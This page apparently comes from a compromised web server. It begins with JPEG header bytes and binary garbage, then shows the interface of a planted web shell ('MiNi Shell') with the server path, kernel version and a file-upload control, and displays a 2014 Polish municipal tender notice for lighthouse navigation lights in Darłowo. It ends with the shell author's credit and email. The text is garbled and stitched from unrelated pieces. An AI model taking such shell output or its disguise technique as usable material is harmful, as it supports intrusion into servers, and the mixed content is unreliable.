JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140113/12256-N-2014.html

<p class="kh_header"><b>Darłowo: Dostawa, montaż i uruchomienie: podejściowego sektorowego światła nawigacyjnego oraz światła nawigacyjnego dalekiego zasięgu</b><br>
<b>Numer ogłoszenia: 12256 - 2014; data zamieszczenia: 13.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Darłowo , Plac Tadeusza Kościuszki 9, 76-150 Darłowo, woj. zachodniopomorskie, tel. 94 3142223 do 26, faks 94 3142333.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.darlowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa, montaż i uruchomienie: podejściowego sektorowego światła nawigacyjnego oraz światła nawigacyjnego dalekiego zasięgu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje dostawę, montaż oraz uruchomienie podejściowego, sektorowego światła nawigacyjnego oraz światła nawigacyjnego dalekiego zasięgu. Podejściowe, sektorowe światło nawigacyjne powinno spełniać następujące wymagania: Lokalizacja: latarnia morska, pomieszczenie laterny w miejscu światła nawigacyjnego dalekiego zasięgu. Parametry nawigacyjne światła: zasięg nominalny świecenia - do 5 Mm, kolory świecenia poszczególnych sektorów: czerwony, biały, zielony, sektory świecenia dla poszczególnych kolorów: zielony: 10o biały: 5o,czerwony: 10o, wysokość światła: 19,7 n.p.m. (jednakowa dla wszystkich sektorów),e) charakterystyka świecenia: Oc G4 (3+1), FW, Oc R4 (3+1),f) kąt dywergencji pionowej lampy powinien wynosić: +-2o przy 80% wartości szczytowego natężenia światła dla koloru białego, +- 4o przy 80% wartości szczytowego natężenia światła dla koloru zielonego i czerwonego.Typ lampy nawigacyjnej: źródło światła: diody LED, jednorodna obudowa aluminiowa, przystosowana do całorocznej pracy w warunkach morskich (w obszarze odpowiedzialności terytorialnej Urzędu Morskiego w Słupsku), soczewka wykonana z akrylu, szkła, lampa wyposażona w błyskacz zawierający co najmniej 246 charakterystyk świecenia (zgodnych z IALA) z możliwością ustawienia przez użytkownika bez potrzeby użycia dodatkowych urządzeń nastawczych lub wyposażona w dedykowane urządzenie do programowania parametrów pracy lampy, możliwość ustawienia natężenia świecenia, wbudowany włącznik zmierzchowy, zakres temperatur pracy lamp od -30o C do +55o C lub większy, spełnianie IP67 w zakresie wodoszczelności, ciężar do 10 kg. Zasilanie: bezpośrednie - zasilacz buforowy 230V AC/12V DC podłączony do obwodu zabezpieczonego przez agregat prądotwórczy latarni morskiej, awaryjne - akumulatory żelowe o parametrach:- napięcie nominalne - 12 V,- pojemność nominalna - 85Ah, - rezystancja wewnętrzna poniżej 8mOhma,- wymiary maksymalne: wysokość: 240 mm (wraz z klemami, uchwytem),szerokość: 330 mm, głębokość: 171 mm,- ilość: 4 szt., ładowane z zasilacza buforowego oraz zainstalowane w przystosowanym stelażu wykonanym z materiału odpornego na korozję.Wymagania dotyczące montażu i uruchomienia: lampę nawigacyjną światła sektorowego należy zainstalować wykorzystując metalowy stół wsporczy znajdujący się w pomieszczeniu laterny, przed rozpoczęciem prac montażowych należy zdemontować istniejące obecnie urządzenia światła nawigacyjnego dalekiego zasięgu, termin demontażu światła dalekiego zasięgu i montażu światła sektorowego zostanie odrębnie ustalony z Urzędem Morskim w Słupsku, uruchomienie i regulacja parametrów światła sektorowego odbędzie się przy udziale pracowników Urzędu Morskiego w Słupsku. Czynności te zakończone będą podpisanym protokołem odbioru prac.Światło nawigacyjne dalekiego zasięgu powinno spełniać następujące wymagania: Lokalizacja: Dolny podest wieży radarowej znajdującej się na ogrodzonej działce terenu wydmowego, stanowiącej część działki nr43/10. Parametry nawigacyjne światła: zasięg nominalny świecenia - 15 Mm, kolory świecenia: biały, sektor świecenia: 040o-220o, wysokość światła: 24 n.p.m., charakterystyka świecenia: Lfl (2) W 15s, kąt dywergencji pionowej lampy powinien wynosić 5-10o. Typ lampy nawigacyjnej: jednorodna obudowa aluminiowa, przystosowana do całorocznej pracy w warunkach morskich (w obszarze odpowiedzialności terytorialnej Urzędu Morskiego w Słupsku), źródło światła: diody LED, obudowa ochronna źródła światła wykonana z akrylu odpornego na działanie wysokiej temperatury, promieni UV, lampa wyposażona w błyskacz zawierający do 256 charakterystyk świecenia (zgodnych z IALA) z możliwością ustawienia przez użytkownika bez potrzeby użycia dodatkowych  urządzeń nastawczych lub wyposażona w dedykowane urządzenie do programowania parametrów pracy lampy, możliwość ustawienia natężenia świecenia, wbudowany włącznik zmierzchowy, zakres temperatur pracy lamp od -30 stopni C do +55 stopni C lub większy, spełnianie IP67 w zakresie wodoszczelności, ciężar do 50 kg. Zasilanie: bezpośrednie - zasilacz buforowy 230V AC/12V lub 24 VDC podłączony do wydzielonego obwodu, awaryjne - akumulatory żelowe o parametrach:- napięcie nominalne - 12 V,- pojemność nominalna - 85Ah, - rezystancja wewnętrzna poniżej 8mOhma,- wymiary maksymalne: wysokość: 240 mm (wraz z klemami, uchwytem),szerokość: 330 mm,głębokość: 171 mm,- ilość: 6 szt., ładowane z zasilacza buforowego oraz zainstalowane w przystosowanym stelażu wykonanym z materiału odpornego na korozję. Metoda podłączenia uwarunkowana napięciem nominalnym zasilacza buforowego. Wymagania dotyczące montażu i uruchomienia:Lampę należy zamontować w miejscu wskazanym przez Urząd Morski w Słupsku. Docelową lokalizacją będzie planowana wieża radarowa, która konstrukcyjnie będzie  przywidywała instalację lampy nawigacyjnej na wysokości 16m n.p.t.
Urządzenia zasilająco-kontrolne należy zamontować w pomieszczeniu kontenera technicznego, który będzie posiadał wydzielony obwód zasilania 230 V AC.
Załączanie świateł nawigacyjnych wraz z synchronizacją:
Oba światła nawigacyjne muszą być wyposażone w urządzenia synchronizujące oraz dające możliwość załączania/wyłączania na cztery sposoby: 1.automatyczne - poprzez centralne urządzenie sterujące (załączająco-synchronizujące), które musi być zamontowane w budynku bosmanatu portu, komunikujące się z lampami nawigacyjnymi drogą radiową na nielicencjonowanym pasmie 433MHz z możliwością ręcznej zmiany częstotliwości, 2.ręczne - umożliwiające ręczne załączenie/wyłączenie świateł w ciągu dnia (np. w czasie mgły) przez bosmana dyżurnego portu.3.lokalne - zamontowane bezpośrednio w lampie nawigacyjnej. Działające w przypadku awarii  centralnego urządzenia  załączająco-synchronizującego, 4.testowe - poprzez wyjście sterujące Qn modułu telemetrycznego (tylko w ciągu dnia).
W przypadku, gdy centralne urządzenie sterujące (pkt 1) nie będzie współpracowało z istniejącymi, radiowymi urządzeniami odbiorczymi (załączająco-synchronizującymi) znajdującymi się na istniejących światłach nawigacyjnych głowicowych (stawy zlokalizowane na głowicach falochronów: zachodniego i wschodniego), wówczas należy wyposażyć te światła w urządzenia zapewniające współpracę z centralnym urządzeniem sterującym (pkt 1).
Monitorowanie:
Układ monitorowania powinien być kompatybilny z istniejącym systemem telemetrycznym Urzędu Morskiego w Słupsku oraz zapewnić gromadzenie i przesyłanie następujących danych:
 w przypadku podejściowego, sektorowego światła nawigacyjnego: wartość napięcia akumulatorów, wartość napięcia zasilania lampy nawigacyjnej, obecność zasilania energetycznego, status pracy światła nawigacyjnego (załączone/wyłączone), sygnalizacja otwarcia drzwi laterny, sygnalizacja otwarcia drzwi budynku latarni, sygnalizacja otwarcia drzwi pomieszczenia agregatu, informacja o załączeniu agregatu prądotwórczego,
w przypadku  światła nawigacyjnego dalekiego zasięgu: wartość napięcia akumulatorów, wartość napięcia zasilania lampy nawigacyjnej, obecność zasilania energetycznego, status pracy światła nawigacyjnego (załączone/wyłączone).
System telemetryczny Urzędu Morskiego w Słupsku składa się z:
centralnego serwera, na którym jest zainstalowane oprogramowanie do wizualizacji i zarządzania Cimplicity Plant Edition (ver.8.2), producent - GE Fanuc.
modułów telemetrycznych zainstalowanych na poszczególnych znakach nawigacyjnych, których zadaniem jest gromadzenie informacji o stanie urządzenia, sterowania oraz komunikacji z serwerem telemetrycznym oraz uprawnionymi użytkownikami poprzez sieć GSM. Rodzaj modułów telemetrycznych zastosowanych w systemie: MT-101, producent - Inventia.
Urząd Morski w Słupsku zapewnia karty SIM pracujące w zamkniętej sieci APN..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.30-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 

Wykonanie usług, dostaw wraz montażem i uruchomieniem dotyczących oznakowania nawigacyjnego podobnych do przedmiotu zamówienia wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
Zamawiający uzna, że Wykonawca posiada niezbędne doświadczenie, jeżeli łączna wartość usług lub dostaw była nie mniejsza niż 250 tys. zł brutto. Ocena spełniania warunków udziału w postępowaniu oraz weryfikacji braku podstaw do wykluczenia z postępowania zostanie dokonana na podstawie złożonych dokumentów w oparciu o zasadę spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, w przypadku wystąpienia niżej wymienionych okoliczności, których Zamawiający nie był w stanie przewidzieć przed publikacją ogłoszenia o przetargu:
1.	Zmiany Umowy będą mogły być wprowadzane w związku z zaistnieniem okoliczności, których wystąpienia Strony nie przewidywały w chwili zawierania Umowy, w tym m.in.:
- wystąpienie robót dodatkowych, których wykonanie uzależnia wykonanie zamówienia podstawowego,
- przekształcenie lub zmiana siedziby którejkolwiek ze stron umowy,
- zmiana osób reprezentujących strony oraz innych osób z nazwiska wymienionych 
w umowie,
- zmiany przepisów dot. obowiązujących stawek podatku VAT.
W sytuacjach określonych powyżej, Strony mając na uwadze poszanowanie wzajemnych interesów, zasady równości Stron oraz ekwiwalentności świadczeń i przede wszystkim zgodny zamiar wykonania Przedmiotu Umowy, określą w niezbędnym zakresie wpływ powyższych okoliczności na dotychczasowe prawa i obowiązki. 
2. 	Niezależnie od postanowień wymienionych powyżej, Strony dopuszczają możliwość 
zmian korzystnych z punktu widzenia realizacji Przedmiotu Umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie Przedmiotu Umowy bądź zwiększających użyteczność Przedmiotu Umowy. 
W takiej sytuacji, Strony wprowadzą do Umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe brzmienie umowy bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też, kierując się poszanowaniem wzajemnych interesów, zasadą równości Stron oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania Przedmiotu Umowy, określą zmiany korzystne z punktu widzenia realizacji Przedmiotu Umowy. 
3.	Wszelkie zmiany wprowadzane do Umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art. 140 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst. jedn. Dz. U. 
z 2013 r. poz. 907 z późn. zm.) oraz zasad ogólnych rządzących tą ustawą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.darlowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.darlowo.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2014 godzina 10:30, miejsce: Biuro Obsługi Interesanta Urzędu Miejskiego w Darłowie, Pl. Tadeusza Kościuszki 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com